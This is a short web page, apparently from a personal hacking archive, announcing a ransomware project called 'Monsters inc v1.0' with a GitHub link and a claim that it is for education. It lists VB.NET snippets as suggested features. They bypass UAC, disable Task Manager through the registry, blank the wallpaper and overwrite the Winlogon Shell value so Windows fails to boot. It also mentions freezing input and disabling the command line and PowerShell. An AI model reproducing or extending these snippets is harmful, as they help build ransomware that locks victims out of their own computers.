Hi👋

----------------------------------------------------------------
/home/0xhunter/public_html
----------------------------------------------------------------

0xHunter:~ ls

Ransomware Monsters inc v1.0Title : Ransomware Monsters inc v1.0
Author : Saleh
Date : 2022-03-03
----------------------------------------------------------------

Hello everyone ..

Simple ransomware , it was built for the purpose of education and development
You can develop the ransomware by adding some features such as :


'Bypass UAC
    'Process.Start("cmd", "/c SET __COMPAT_LAYER=RunAsInvoker")
    'Disable taskmanager
    'My.Computer.Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System")
    'My.Computer.Registry.SetValue("DisableTaskMgr", 1, RegistryValueKind.String)
    'Remove wallpaper desktop
    'My.Computer.Registry.CurrentUser.CreateSubKey("Control Panel\\Desktop")
    'My.Computer.Registry.SetValue("Wallpaper", "", RegistryValueKind.String)
    'If you shutdown your computer, you cant run winodws well
    'My.Computer.Registry.CurrentUser.CreateSubKey("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon")
    'My.Computer.Registry.SetValue("Shell", "empty", RegistryValueKind.String)

    'Frazee mouse/keyboard + kill proccess + disable command line&Powershell

 

 

Github: https://github.com/xSaleh/Monsters_inc_v1.0

 

./Regards


----------------------------------------------------------------